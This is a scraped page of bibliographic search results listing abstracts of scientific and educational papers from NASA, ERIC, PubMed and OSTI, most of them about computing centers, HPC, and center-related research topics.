    -Cooled High-Performance Computing Technology at the ESIF February 28, 2018 NREL Launches New Website for High-Performance Computing System Users The National Renewable Energy Laboratory (NREL) Computational Science Center has launched a revamped website for users of the lab's high-performance computing (HPC

  7. Computer Training for Seniors: An Academic-Community Partnership

    ERIC Educational Resources Information Center

    Sanders, Martha J.; O'Sullivan, Beth; DeBurra, Katherine; Fedner, Alesha

    2013-01-01

    Computer technology is integral to information retrieval, social communication, and social interaction. However, only 47% of seniors aged 65 and older use computers. The purpose of this study was to determine the impact of a client-centered computer program on computer skills, attitudes toward computer use, and generativity in novice senior…

  8. Benefits Analysis of Multi-Center Dynamic Weather Routes

    NASA Technical Reports Server (NTRS)

    Sheth, Kapil; McNally, David; Morando, Alexander; Clymer, Alexis; Lock, Jennifer; Petersen, Julien

    2014-01-01

    Dynamic weather routes are flight plan corrections that can provide airborne flights more than user-specified minutes of flying-time savings, compared to their current flight plan. These routes are computed from the aircraft's current location to a flight plan fix downstream (within a predefined limit region), while avoiding forecasted convective weather regions. The Dynamic Weather Routes automation has been continuously running with live air traffic data for a field evaluation at the American Airlines Integrated Operations Center in Fort Worth, TX since July 31, 2012, where flights within the Fort Worth Air Route Traffic Control Center are evaluated for time savings. This paper extends the methodology to all Centers in United States and presents benefits analysis of Dynamic Weather Routes automation, if it was implemented in multiple airspace Centers individually and concurrently. The current computation of dynamic weather routes requires a limit rectangle so that a downstream capture fix can be selected, preventing very large route changes spanning several Centers. In this paper, first, a method of computing a limit polygon (as opposed to a rectangle used for Fort Worth Center) is described for each of the 20 Centers in the National Airspace System. The Future ATM Concepts Evaluation Tool, a nationwide simulation and analysis tool, is used for this purpose. After a comparison of results with the Center-based Dynamic Weather Routes automation in Fort Worth Center, results are presented for 11 Centers in the contiguous United States. These Centers are generally most impacted by convective weather. A breakdown of individual Center and airline savings is presented and the results indicate an overall average savings of about 10 minutes of flying time are obtained per flight.

  9. Library Media Learning and Play Center.

    ERIC Educational Resources Information Center

    Faber, Therese; And Others

    Preschool educators developed a library media learning and play center to enable children to "experience" a library; establish positive attitudes about the library; and encourage respect for self, others, and property. The center had the following areas: check-in and check-out desk, quiet reading section, computer center, listening center, video…

  10. RIACS

    NASA Technical Reports Server (NTRS)

    Moore, Robert C.

    1998-01-01

    The Research Institute for Advanced Computer Science (RIACS) was established by the Universities Space Research Association (USRA) at the NASA Ames Research Center (ARC) on June 6, 1983. RIACS is privately operated by USRA, a consortium of universities that serves as a bridge between NASA and the academic community. Under a five-year co-operative agreement with NASA, research at RIACS is focused on areas that are strategically enabling to the Ames Research Center's role as NASA's Center of Excellence for Information Technology. The primary mission of RIACS is charted to carry out research and development in computer science. This work is devoted in the main to tasks that are strategically enabling with respect to NASA's bold mission in space exploration and aeronautics. There are three foci for this work: (1) Automated Reasoning. (2) Human-Centered Computing. and (3) High Performance Computing and Networking. RIACS has the additional goal of broadening the base of researcher in these areas of importance to the nation's space and aeronautics enterprises. Through its visiting scientist program, RIACS facilitates the participation of university-based researchers, including both faculty and students, in the research activities of NASA and RIACS. RIACS researchers work in close collaboration with NASA computer scientists on projects such as the Remote Agent Experiment on Deep Space One mission, and Super-Resolution Surface Modeling.

  11. The effective use of virtualization for selection of data centers in a cloud computing environment

    NASA Astrophysics Data System (ADS)

    Kumar, B. Santhosh; Parthiban, Latha

    2018-04-01

    Data centers are the places which consist of network of remote servers to store, access and process the data. Cloud computing is a technology where users worldwide will submit the tasks and the service providers will direct the requests to the data centers which are responsible for execution of tasks. The servers in the data centers need to employ the virtualization concept so that multiple tasks can be executed simultaneously. In this paper we proposed an algorithm for data center selection based on energy of virtual machines created in server. The virtualization energy in each of the server is calculated and total energy of the data center is obtained by the summation of individual server energy. The tasks submitted are routed to the data center with least energy consumption which will result in minimizing the operational expenses of a service provider.

  12. A hypothesis on the formation of the primary ossification centers in the membranous neurocranium: a mathematical and computational model.

    PubMed

    Garzón-Alvarado, Diego A

    2013-01-21

    This article develops a model of the appearance and location of the primary centers of ossification in the calvaria. The model uses a system of reaction-diffusion equations of two molecules (BMP and Noggin) whose behavior is of type activator-substrate and its solution produces Turing patterns, which represents the primary ossification centers. Additionally, the model includes the level of cell maturation as a function of the location of mesenchymal cells. Thus the mature cells can become osteoblasts due to the action of BMP2. Therefore, with this model, we can have two frontal primary centers, two parietal, and one, two or more occipital centers. The location of these centers in the simplified computational model is highly consistent with those centers found at an embryonic level. Copyright © 2012 Elsevier Ltd. All rights reserved.

  13. Establishment of a Beta Test Center for the NPARC Code at Central State University

    NASA Technical Reports Server (NTRS)

    Okhio, Cyril B.

    1996-01-01

    Central State University has received a supplementary award to purchase computer workstations for the NPARC (National Propulsion Ames Research Center) computational fluid dynamics code BETA Test Center. The computational code has also been acquired for installation on the workstations. The acquisition of this code is an initial step for CSU in joining an alliance composed of NASA, AEDC, The Aerospace Industry, and academia. A post-Doctoral research Fellow from a neighboring university will assist the PI in preparing a template for Tutorial documents for the BETA test center. The major objective of the alliance is to establish a national applications-oriented CFD capability, centered on the NPARC code. By joining the alliance, the BETA test center at CSU will allow the PI, as well as undergraduate and post-graduate students to test the capability of the NPARC code in predicting the physics of aerodynamic/geometric configurations that are of interest to the alliance. Currently, CSU is developing a once a year, hands-on conference/workshop based upon the experience acquired from running other codes similar to the NPARC code in the first year of this grant.

  14. BNL ATLAS Grid Computing

    ScienceCinema

    Michael Ernst

    2017-12-09

    As the sole Tier-1 computing facility for ATLAS in the United States and the largest ATLAS computing center worldwide Brookhaven provides a large portion of the overall computing resources for U.S. collaborators and serves as the central hub for storing,

  15. Patient-centered computing: can it curb malpractice risk?

    PubMed

    Bartlett, E E

    1993-01-01

    The threat of a medical malpractice suit represents a major cause of career dissatisfaction for American physicians. Patient-centered computing may improve physician-patient communications, thereby reducing liability risk. This review describes programs that have sought to enhance patient education and involvement pertaining to 5 major categories of malpractice lawsuits: Diagnosis, medications, obstetrics, surgery, and treatment errors.

  16. Patient-centered computing: can it curb malpractice risk?

    PubMed Central

    Bartlett, E. E.

    1993-01-01

    The threat of a medical malpractice suit represents a major cause of career dissatisfaction for American physicians. Patient-centered computing may improve physician-patient communications, thereby reducing liability risk. This review describes programs that have sought to enhance patient education and involvement pertaining to 5 major categories of malpractice lawsuits: Diagnosis, medications, obstetrics, surgery, and treatment errors. PMID:8130563

  17. Initial Comparison of Single Cylinder Stirling Engine Computer Model Predictions with Test Results

    NASA Technical Reports Server (NTRS)

    Tew, R. C., Jr.; Thieme, L. G.; Miao, D.

    1979-01-01

    A Stirling engine digital computer model developed at NASA Lewis Research Center was configured to predict the performance of the GPU-3 single-cylinder rhombic drive engine. Revisions to the basic equations and assumptions are discussed. Model predictions with the early results of the Lewis Research Center GPU-3 tests are compared.

  18. A Report on the Design and Construction of the University of Massachusetts Computer Science Center.

    ERIC Educational Resources Information Center

    Massachusetts State Office of the Inspector General, Boston.

    This report describes a review conducted by the Massachusetts Office of the Inspector General on the construction of the Computer Science and Development Center at the University of Massachusetts, Amherst. The office initiated the review after hearing concerns about the management of the project, including its delayed completion and substantial…

  19. Improved method for sea ice age computation based on combination of sea ice drift and concentration

    NASA Astrophysics Data System (ADS)

    Korosov, Anton; Rampal, Pierre; Lavergne, Thomas; Aaboe, Signe

    2017-04-01

    Sea Ice Age is one of the components of the Sea Ice ECV as defined by the Global Climate Observing System (GCOS) [WMO, 2015]. It is an important climate indicator describing the sea ice state in addition to sea ice concentration (SIC) and thickness (SIT). The amount of old/thick ice in the Arctic Ocean has been decreasing dramatically [Perovich et al. 2015]. Kwok et al. [2009] reported significant decline in the MYI share and consequent loss of thickness and therefore volume. Today, there is only one acknowledged sea ice age climate data record [Tschudi, et al. 2015], based on Maslanik et al. [2011] provided by National Snow and Ice Data Center (NSIDC) [http://nsidc.org/data/docs/daac/nsidc0611-sea-ice-age/]. The sea ice age algorithm [Fowler et al., 2004] is using satellite-derived ice drift for Lagrangian tracking of individual ice parcels (12-km grid cells) defined by areas of sea ice concentration > 15% [Maslanik et al., 2011], i.e. sea ice extent, according to the NASA Team algorithm [Cavalieri et al., 1984]. This approach has several drawbacks. (1) Using sea ice extent instead of sea ice concentration leads to overestimation of the amount of older ice. (2) The individual ice parcels are not advected uniformly over (long) time. This leads to undersampling in areas of consistent ice divergence. (3) The end product grid cells are assigned the age of the oldest ice parcel within that cell, and the frequency distribution of the ice age is not taken into account. In addition, the base sea ice drift product (https://nsidc.org/data/docs/daac/nsidc0116_icemotion.gd.html) is known to exhibit greatly reduced accuracy during the summer season [Sumata et al 2014, Szanyi, 2016] as it only relies on a combination of sea ice drifter trajectories and wind-driven "free-drift" motion during summer. This results in a significant overestimate of old-ice content, incorrect shape of the old-ice pack, and lack of information about the ice age distribution within the grid cells. We propose an improved algorithm for sea ice age computation based on combination of sea ice drift and concentration, both derived from satellite measurements. The base sea ice drift product is from the Ocean and Sea Ice Satellite Application Facility (EUMETSAT OSI-SAF, Lavergne et al., 2011). This operational product was recently upgraded to also process ice drift during the summer season [http://osisaf.met.no/]. . The Sea Ice Concentration product from the ESA Sea Ice Climate Change Initiative (ESA SI CCI) project is used to adjust the partial concentrations at every advection step [http://esa-cci.nersc.no/]. Each grid cell is characterised by its partial concentration of water and ice of different ages. Also, sea ice convergence and divergence are used to realistically adjust the ratio of young ice / multi year ice. Comparison of results from this new algorithm with results derived from drifting ice buoys deployed in 2013 - 2016 demonstrates clear improvement in the ice age estimation. The spatial distribution of sea ice age in the new product compares better to the Sea Ice Type derived from satellite passive microwave and scatterometer measurements, both with regard to the decreased patchiness and the shape. The new ice age algorithm is developed in the context of the ESA CCI, and is designed for production of more accurate sea ice age climate data records in the future.

  20. Higher-order methods for simulations on quantum computers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sornborger, A.T.; Stewart, E.D.

    1999-09-01

    To implement many-qubit gates for use in quantum simulations on quantum computers efficiently, we develop and present methods reexpressing exp[[minus]i(H[sub 1]+H[sub 2]+[center dot][center dot][center dot])[Delta]t] as a product of factors exp[[minus]iH[sub 1][Delta]t], exp[[minus]iH[sub 2][Delta]t],[hor ellipsis], which is accurate to third or fourth order in [Delta]t. The methods we derive are an extended form of the symplectic method, and can also be used for an integration of classical Hamiltonians on classical computers. We derive both integral and irrational methods, and find the most efficient methods in both cases. [copyright] [ital 1999] [ital The American Physical Society

  1. Impact of configuration management system of computer center on support of scientific projects throughout their lifecycle

    NASA Astrophysics Data System (ADS)

    Bogdanov, A. V.; Iuzhanin, N. V.; Zolotarev, V. I.; Ezhakova, T. R.

    2017-12-01

    In this article the problem of scientific projects support throughout their lifecycle in the computer center is considered in every aspect of support. Configuration Management system plays a connecting role in processes related to the provision and support of services of a computer center. In view of strong integration of IT infrastructure components with the use of virtualization, control of infrastructure becomes even more critical to the support of research projects, which means higher requirements for the Configuration Management system. For every aspect of research projects support, the influence of the Configuration Management system is being reviewed and development of the corresponding elements of the system is being described in the present paper.

  2. Finance for practicing radiologists.

    PubMed

    Berlin, Jonathan W; Lexa, Frank James

    2005-03-01

    This article reviews basic finance for radiologists. Using the example of a hypothetical outpatient computed tomography center, readers are introduced to the concept of net present value. This concept refers to the current real value of anticipated income in the future, realizing that revenue in the future has less value than it does today. Positive net present value projects add wealth to a practice and should be pursued. The article details how costs and revenues for a hypothetical outpatient computed tomography center are determined and elucidates the difference between fixed costs and variable costs. The article provides readers with the steps used to calculate the break-even volume for an outpatient computed tomography center given situation-specific assumptions regarding staff, equipment lease rates, rent, and third-party payer mix.

  3. Readiness of healthcare providers for eHealth: the case from primary healthcare centers in Lebanon.

    PubMed

    Saleh, Shadi; Khodor, Rawya; Alameddine, Mohamad; Baroud, Maysa

    2016-11-10

    eHealth can positively impact the efficiency and quality of healthcare services. Its potential benefits extend to the patient, healthcare provider, and organization. Primary healthcare (PHC) settings may particularly benefit from eHealth. In these settings, healthcare provider readiness is key to successful eHealth implementation. Accordingly, it is necessary to explore the potential readiness of providers to use eHealth tools. Therefore, the purpose of this study was to assess the readiness of healthcare providers working in PHC centers in Lebanon to use eHealth tools. A self-administered questionnaire was used to assess participants' socio-demographics, computer use, literacy, and access, and participants' readiness for eHealth implementation (appropriateness, management support, change efficacy, personal beneficence). The study included primary healthcare providers (physicians, nurses, other providers) working in 22 PHC centers distributed across Lebanon. Descriptive and bivariate analyses (ANOVA, independent t-test, Kruskal Wallis, Tamhane's T2) were used to compare participant characteristics to the level of readiness for the implementation of eHealth. Of the 541 questionnaires, 213 were completed (response rate: 39.4 %). The majority of participants were physicians (46.9 %), and nurses (26.8 %). Most physicians (54.0 %), nurses (61.4 %), and other providers (50.9 %) felt comfortable using computers, and had access to computers at their PHC center (physicians: 77.0 %, nurses: 87.7 %, others: 92.5 %). Frequency of computer use varied. The study found a significant difference for personal beneficence, management support, and change efficacy among different healthcare providers, and relative to participants' level of comfort using computers. There was a significant difference by level of comfort using computers and appropriateness. A significant difference was also found between those with access to computers in relation to personal beneficence and change efficacy; and between frequency of computer use and change efficacy. The implementation of eHealth cannot be achieved without the readiness of healthcare providers. This study demonstrates that the majority of healthcare providers at PHC centers across Lebanon are ready for eHealth implementation. The findings of this study can be considered by decision makers to enhance and scale-up the use of eHealth in PHC centers nationally. Efforts should be directed towards capacity building for healthcare providers.

  4. Selected Papers of the Southeastern Writing Center Association.

    ERIC Educational Resources Information Center

    Roberts, David H., Ed.; Wolff, William C., Ed.

    Addressing a variety of concerns of writing center directors and staff, directors of freshman composition, and English department chairs, the papers in this collection discuss writing center research and evaluation, writing center tutors, and computers in the writing center. The titles of the essays and their authors are as follows: (1) "Narrative…

  5. The Hospital-Based Drug Information Center.

    ERIC Educational Resources Information Center

    Hopkins, Leigh

    1982-01-01

    Discusses the rise of drug information centers in hospitals and medical centers, highlighting staffing, functions, typical categories of questions received by centers, and sources used. An appendix of drug information sources included in texts, updated services, journals, and computer databases is provided. Thirteen references are listed. (EJS)

  6. Singularity: Scientific containers for mobility of compute.

    PubMed

    Kurtzer, Gregory M; Sochat, Vanessa; Bauer, Michael W

    2017-01-01

    Here we present Singularity, software developed to bring containers and reproducibility to scientific computing. Using Singularity containers, developers can work in reproducible environments of their choosing and design, and these complete environments can easily be copied and executed on other platforms. Singularity is an open source initiative that harnesses the expertise of system and software engineers and researchers alike, and integrates seamlessly into common workflows for both of these groups. As its primary use case, Singularity brings mobility of computing to both users and HPC centers, providing a secure means to capture and distribute software and compute environments. This ability to create and deploy reproducible environments across these centers, a previously unmet need, makes Singularity a game changing development for computational science.

  7. Singularity: Scientific containers for mobility of compute

    PubMed Central

    Kurtzer, Gregory M.; Bauer, Michael W.

    2017-01-01

    Here we present Singularity, software developed to bring containers and reproducibility to scientific computing. Using Singularity containers, developers can work in reproducible environments of their choosing and design, and these complete environments can easily be copied and executed on other platforms. Singularity is an open source initiative that harnesses the expertise of system and software engineers and researchers alike, and integrates seamlessly into common workflows for both of these groups. As its primary use case, Singularity brings mobility of computing to both users and HPC centers, providing a secure means to capture and distribute software and compute environments. This ability to create and deploy reproducible environments across these centers, a previously unmet need, makes Singularity a game changing development for computational science. PMID:28494014

  8. Deep Space Network (DSN), Network Operations Control Center (NOCC) computer-human interfaces

    NASA Technical Reports Server (NTRS)

    Ellman, Alvin; Carlton, Magdi

    1993-01-01

    The Network Operations Control Center (NOCC) of the DSN is responsible for scheduling the resources of DSN, and monitoring all multi-mission spacecraft tracking activities in real-time. Operations performs this job with computer systems at JPL connected to over 100 computers at Goldstone, Australia and Spain. The old computer system became obsolete, and the first version of the new system was installed in 1991. Significant improvements for the computer-human interfaces became the dominant theme for the replacement project. Major issues required innovating problem solving. Among these issues were: How to present several thousand data elements on displays without overloading the operator? What is the best graphical representation of DSN end-to-end data flow? How to operate the system without memorizing mnemonics of hundreds of operator directives? Which computing environment will meet the competing performance requirements? This paper presents the technical challenges, engineering solutions, and results of the NOCC computer-human interface design.

  9. Computer Center: Setting Up a Microcomputer Center--1 Person's Perspective.

    ERIC Educational Resources Information Center

    Duhrkopf, Richard, Ed.; Collins, Michael, A. J., Ed.

    1988-01-01

    Considers eight components to be considered in setting up a microcomputer center for use with college classes. Discussions include hardware, software, physical facility, furniture, technical support, personnel, continuing financial expenditures, and security. (CW)

  10. Cloud Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pete Beckman and Ian Foster

    Chicago Matters: Beyond Burnham (WTTW). Chicago has become a world center of "cloud computing." Argonne experts Pete Beckman and Ian Foster explain what "cloud computing" is and how you probably already use it on a daily basis.

  11. Lift and center of pressure of wing-body-tail combinations at subsonic, transonic, and supersonic speeds

    NASA Technical Reports Server (NTRS)

    Pitts, William C; Nielsen, Jack N; Kaattari, George E

    1957-01-01

    A method is presented for calculating the lift and centers of pressure of wing-body and wing-body-tail combinations at subsonic, transonic, and supersonic speeds. A set of design charts and a computing table are presented which reduce the computations to routine operations. Comparison between the estimated and experimental characteristics for a number of wing-body and wing-body-tail combinations shows correlation to within + or - 10 percent on lift and to within about + or - 0.02 of the body length on center of pressure.

  12. The Role of Computers in Research and Development at Langley Research Center

    NASA Technical Reports Server (NTRS)

    Wieseman, Carol D. (Compiler)

    1994-01-01

    This document is a compilation of presentations given at a workshop on the role cf computers in research and development at the Langley Research Center. The objectives of the workshop were to inform the Langley Research Center community of the current software systems and software practices in use at Langley. The workshop was organized in 10 sessions: Software Engineering; Software Engineering Standards, methods, and CASE tools; Solutions of Equations; Automatic Differentiation; Mosaic and the World Wide Web; Graphics and Image Processing; System Design Integration; CAE Tools; Languages; and Advanced Topics.

  13. Mass storage system experiences and future needs at the National Center for Atmospheric Research

    NASA Technical Reports Server (NTRS)

    Olear, Bernard T.

    1991-01-01

    A summary and viewgraphs of a discussion presented at the National Space Science Data Center (NSSDC) Mass Storage Workshop is included. Some of the experiences of the Scientific Computing Division at the National Center for Atmospheric Research (NCAR) dealing the the 'data problem' are discussed. A brief history and a development of some basic mass storage system (MSS) principles are given. An attempt is made to show how these principles apply to the integration of various components into NCAR's MSS. Future MSS needs for future computing environments is discussed.

  14. Computer Aided Manufacturing.

    ERIC Educational Resources Information Center

    Insolia, Gerard

    This document contains course outlines in computer-aided manufacturing developed for a business-industry technology resource center for firms in eastern Pennsylvania by Northampton Community College. The four units of the course cover the following: (1) introduction to computer-assisted design (CAD)/computer-assisted manufacturing (CAM); (2) CAM…

  15. Development of automated electromagnetic compatibility test facilities at Marshall Space Flight Center

    NASA Technical Reports Server (NTRS)

    Harrison, Cecil A.

    1986-01-01

    The efforts to automate the electromagentic compatibility (EMC) test facilites at Marshall Flight Center were examined. A battery of nine standard tests is to be integrated by means of a desktop computer-controller in order to provide near real-time data assessment, store the data acquired during testing on flexible disk, and provide computer production of the certification report.

  16. Mind Transplants Or: The Role of Computer Assisted Instruction in the Future of the Library.

    ERIC Educational Resources Information Center

    Lyon, Becky J.

    Computer assisted instruction (CAI) may well represent the next phase in the involvement of the library or learning resources center with media and the educational process. The Lister Hill Center Experimental CAI Network was established in July, 1972, on the recommendation of the National Library of Medicine, to test the feasibility of sharing CAI…

  17. Center for Efficient Exascale Discretizations Software Suite

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Kolev, Tzanio; Dobrev, Veselin; Tomov, Vladimir

    The CEED Software suite is a collection of generally applicable software tools focusing on the following computational motives: PDE discretizations on unstructured meshes, high-order finite element and spectral element methods and unstructured adaptive mesh refinement. All of this software is being developed as part of CEED, a co-design Center for Efficient Exascale Discretizations, within DOE's Exascale Computing Project (ECP) program.

  18. The Development of a Learning Dashboard for Lecturers: A Case Study on a Student-Centered E-Learning Environment

    ERIC Educational Resources Information Center

    Santoso, Harry B.; Batuparan, Alivia Khaira; Isal, R. Yugo K.; Goodridge, Wade H.

    2018-01-01

    Student Centered e-Learning Environment (SCELE) is a Moodle-based learning management system (LMS) that has been modified to enhance learning within a computer science department curriculum offered by the Faculty of Computer Science of large public university in Indonesia. This Moodle provided a mechanism to record students' activities when…

  19. CNC Turning Center Operations and Prove Out. Computer Numerical Control Operator/Programmer. 444-334.

    ERIC Educational Resources Information Center

    Skowronski, Steven D.

    This student guide provides materials for a course designed to instruct the student in the recommended procedures used when setting up tooling and verifying part programs for a two-axis computer numerical control (CNC) turning center. The course consists of seven units. Unit 1 discusses course content and reviews and demonstrates set-up procedures…

  20. Pilot Project in Computer Assisted Instruction for Adult Basic Education Students. Adult Learning Centers, the Adult Program, 1982-83.

    ERIC Educational Resources Information Center

    Buckley, Elizabeth; Johnston, Peter

    In February 1977, computer assisted instruction (CAI) was introducted to the Great Neck Adult Learning Centers (GNALC) to promote greater cognitive and affective growth of educationally disadvantaged adults. The project expanded to include not only adult basic education (ABE) students studying in the learning laboratory, but also ABE students…

  1. The Development of a Robot-Based Learning Companion: A User-Centered Design Approach

    ERIC Educational Resources Information Center

    Hsieh, Yi-Zeng; Su, Mu-Chun; Chen, Sherry Y.; Chen, Gow-Dong

    2015-01-01

    A computer-vision-based method is widely employed to support the development of a variety of applications. In this vein, this study uses a computer-vision-based method to develop a playful learning system, which is a robot-based learning companion named RobotTell. Unlike existing playful learning systems, a user-centered design (UCD) approach is…

  2. CENTER CONDITIONS AND CYCLICITY FOR A FAMILY OF CUBIC SYSTEMS: COMPUTER ALGEBRA APPROACH.

    PubMed

    Ferčec, Brigita; Mahdi, Adam

    2013-01-01

    Using methods of computational algebra we obtain an upper bound for the cyclicity of a family of cubic systems. We overcame the problem of nonradicality of the associated Bautin ideal by moving from the ring of polynomials to a coordinate ring. Finally, we determine the number of limit cycles bifurcating from each component of the center variety.

  3. About High-Performance Computing at NREL | High-Performance Computing |

    Science.gov Websites

    Day(s): First Thursday of every month Hours: 11 a.m. - 12 p.m. Location: ESIF B211-Edison Conference Room Contact: Jennifer Southerland Insight Center - Visualization Tools Day(s): Every Monday Hours: 10 Data System Day(s): Every Monday Hours: 10 a.m. - 11 a.m. Location: ESIF B308-Insight Center

  4. Exploring the Effects of Student-Centered Project-Based Learning with Initiation on Students' Computing Skills: A Quasi-Experimental Study of Digital Storytelling

    ERIC Educational Resources Information Center

    Tsai, Chia-Wen; Shen, Pei-Di; Lin, Rong-An

    2015-01-01

    This study investigated, via quasi-experiments, the effects of student-centered project-based learning with initiation (SPBL with Initiation) on the development of students' computing skills. In this study, 96 elementary school students were selected from four class sections taking a course titled "Digital Storytelling" and were assigned…

  5. High-End Scientific Computing

    EPA Pesticide Factsheets

    EPA uses high-end scientific computing, geospatial services and remote sensing/imagery analysis to support EPA's mission. The Center for Environmental Computing (CEC) assists the Agency's program offices and regions to meet staff needs in these areas.

  6. HPCCP/CAS Workshop Proceedings 1998

    NASA Technical Reports Server (NTRS)

    Schulbach, Catherine; Mata, Ellen (Editor); Schulbach, Catherine (Editor)

    1999-01-01

    This publication is a collection of extended abstracts of presentations given at the HPCCP/CAS (High Performance Computing and Communications Program/Computational Aerosciences Project) Workshop held on August 24-26, 1998, at NASA Ames Research Center, Moffett Field, California. The objective of the Workshop was to bring together the aerospace high performance computing community, consisting of airframe and propulsion companies, independent software vendors, university researchers, and government scientists and engineers. The Workshop was sponsored by the HPCCP Office at NASA Ames Research Center. The Workshop consisted of over 40 presentations, including an overview of NASA's High Performance Computing and Communications Program and the Computational Aerosciences Project; ten sessions of papers representative of the high performance computing research conducted within the Program by the aerospace industry, academia, NASA, and other government laboratories; two panel sessions; and a special presentation by Mr. James Bailey.

  7. Novel LLM series high density energy materials: Synthesis, characterization, and thermal stability

    NASA Astrophysics Data System (ADS)

    Pagoria, Philip; Zhang, Maoxi; Tsyshevskiy, Roman; Kuklja, Maija

    Novel high density energy materials must satisfy specific requirements, such as an increased performance, reliably high stability to external stimuli, cost-efficiency and ease of synthesis, be environmentally benign, and be safe for handling and transportation. During the last decade, the attention of researchers has drifted from widely used nitroester-, nitramine-, and nitroaromatic-based explosives to nitrogen-rich heterocyclic compounds. Good thermal stability, the low melting point, high density, and moderate sensitivity make heterocycle materials attractive candidates for use as oxidizers in rocket propellants and fuels, secondary explosives, and possibly as melt-castable ingredients of high explosive formulations. In this report, the synthesis, characterization, and results of quantum-chemical DFT study of thermal stability of LLM-191, LLM-192 and LLM-200 high density energy materials are presented. Work performed under the auspices of the DOE by the LLNL (Contract DE-AC52-07NA27344). This research is supported in part by ONR (Grant N00014-12-1-0529) and NSF. We used NSF XSEDE (Grant DMR-130077) and DOE NERSC (Contract DE-AC02-05CH11231) resources.

  8. Non-resonant divertors for stellarators

    NASA Astrophysics Data System (ADS)

    Boozer, Allen; Punjabi, Alkesh

    2017-10-01

    The outermost confining magnetic surface in optimized stellarators has sharp edges, which resemble tokamak X-points. The plasma cross section has an even number of edges at the beginning but an odd number half way through the period. Magnetic field lines cannot cross sharp edges, but stellarator edges have a finite length and do not determine the rotational transform on the outermost confining surface. Just outside the last confining surface, surfaces formed by magnetic field lines have splits containing two adjacent magnetic flux tubes: one with entering and the other with an equal existing flux to the walls. The splits become wider with distance outside the outermost confining surface. These flux tubes form natural non-resonant stellarator divertors, which we are studying using maps. This work is supported by the US DOE Grants DE-FG02-95ER54333 to Columbia University and DE-FG02-01ER54624 and DE-FG02-04ER54793 to Hampton University and used resources of the NERSC, supported by the Office of Science, US DOE, under Contract No. DE-AC02-.

  9. Flow and Sedimentation of particulate suspensions in Fractures

    NASA Astrophysics Data System (ADS)

    Lo, Tak Shing; Koplik, Joel

    2011-03-01

    Suspended particles are commonly found in reservoir fluids. They alter the rheology of the flowing liquids and may obstruct transport by narrowing flow channels due to gravitational sedimentation. An understanding of the dynamics of particle transport and deposition is, therefore, important to many geological, enviromental and industrial processes. Realistic geological fractures usually have irregular surfaces with self-affine structures, and the surface roughness plays a crucial role in the flow and sedimentation processes. Recently, we have used the lattice Boltzmann method to study the combined effects of sedimentation and transport of particles suspended in a Newtonian fluid in a pressure-driven flow in self-affine channels, which is especially relevant to clogging phenomena where sediments may block fluid flows in narrow constrictions of the channels. The lattice Boltzmann method is flexible and particularly suitable for handling irregular geometry. Our work covers a broad range in Reynolds and buoyancy numbers, and in particle concentrations. In this talk, we focus on the transitions between the ``jammed'' and the ``flow'' states in fractures, and on the effects of nonuniform particle size distributions. Work supported by DOE and NERSC.

  10. NASA Center for Climate Simulation (NCCS) Advanced Technology AT5 Virtualized Infiniband Report

    NASA Technical Reports Server (NTRS)

    Thompson, John H.; Bledsoe, Benjamin C.; Wagner, Mark; Shakshober, John; Fromkin, Russ

    2013-01-01

    The NCCS is part of the Computational and Information Sciences and Technology Office (CISTO) of Goddard Space Flight Center's (GSFC) Sciences and Exploration Directorate. The NCCS's mission is to enable scientists to increase their understanding of the Earth, the solar system, and the universe by supplying state-of-the-art high performance computing (HPC) solutions. To accomplish this mission, the NCCS (https://www.nccs.nasa.gov) provides high performance compute engines, mass storage, and network solutions to meet the specialized needs of the Earth and space science user communities

  11. ED adds business center to wait area.

    PubMed

    2007-10-01

    Providing your patients with Internet access in the waiting area can do wonders for their attitudes and make them much more understanding of long wait times. What's more, it doesn't take a fortune to create a business center. The ED at Florida Hospital Celebration (FL) Health made a world of difference with just a couple of computers and a printer. Have your information technology staff set the computers up to preserve the privacy of your internal computer system, and block out offensive sites. Access to medical sites can help reinforce your patient education efforts.

  12. Application of technology developed for flight simulation at NASA. Langley Research Center

    NASA Technical Reports Server (NTRS)

    Cleveland, Jeff I., II

    1991-01-01

    In order to meet the stringent time-critical requirements for real-time man-in-the-loop flight simulation, computer processing operations including mathematical model computation and data input/output to the simulators must be deterministic and be completed in as short a time as possible. Personnel at NASA's Langley Research Center are currently developing the use of supercomputers for simulation mathematical model computation for real-time simulation. This, coupled with the use of an open systems software architecture, will advance the state-of-the-art in real-time flight simulation.

  13. Implementing the Data Center Energy Productivity Metric in a High Performance Computing Data Center

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sego, Landon H.; Marquez, Andres; Rawson, Andrew

    2013-06-30

    As data centers proliferate in size and number, the improvement of their energy efficiency and productivity has become an economic and environmental imperative. Making these improvements requires metrics that are robust, interpretable, and practical. We discuss the properties of a number of the proposed metrics of energy efficiency and productivity. In particular, we focus on the Data Center Energy Productivity (DCeP) metric, which is the ratio of useful work produced by the data center to the energy consumed performing that work. We describe our approach for using DCeP as the principal outcome of a designed experiment using a highly instrumented,more » high-performance computing data center. We found that DCeP was successful in clearly distinguishing different operational states in the data center, thereby validating its utility as a metric for identifying configurations of hardware and software that would improve energy productivity. We also discuss some of the challenges and benefits associated with implementing the DCeP metric, and we examine the efficacy of the metric in making comparisons within a data center and between data centers.« less

  14. ENVIRONMENTAL BIOINFORMATICS AND COMPUTATIONAL TOXICOLOGY CENTER

    EPA Science Inventory

    The Center activities focused on integrating developmental efforts from the various research projects of the Center, and collaborative applications involving scientists from other institutions and EPA, to enhance research in critical areas. A representative sample of specif...

  15. Improving User Notification on Frequently Changing HPC Environments

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fuson, Christopher B; Renaud, William A

    2016-01-01

    Today s HPC centers user environments can be very complex. Centers often contain multiple large complicated computational systems each with their own user environment. Changes to a system s environment can be very impactful; however, a center s user environment is, in one-way or another, frequently changing. Because of this, it is vital for centers to notify users of change. For users, untracked changes can be costly, resulting in unnecessary debug time as well as wasting valuable compute allocations and research time. Communicating frequent change to diverse user communities is a common and ongoing task for HPC centers. This papermore » will cover the OLCF s current processes and methods used to communicate change to users of the center s large Cray systems and supporting resources. The paper will share lessons learned and goals as well as practices, tools, and methods used to continually improve and reach members of the OLCF user community.« less

  16. Robust pupil center detection using a curvature algorithm

    NASA Technical Reports Server (NTRS)

    Zhu, D.; Moore, S. T.; Raphan, T.; Wall, C. C. (Principal Investigator)

    1999-01-01

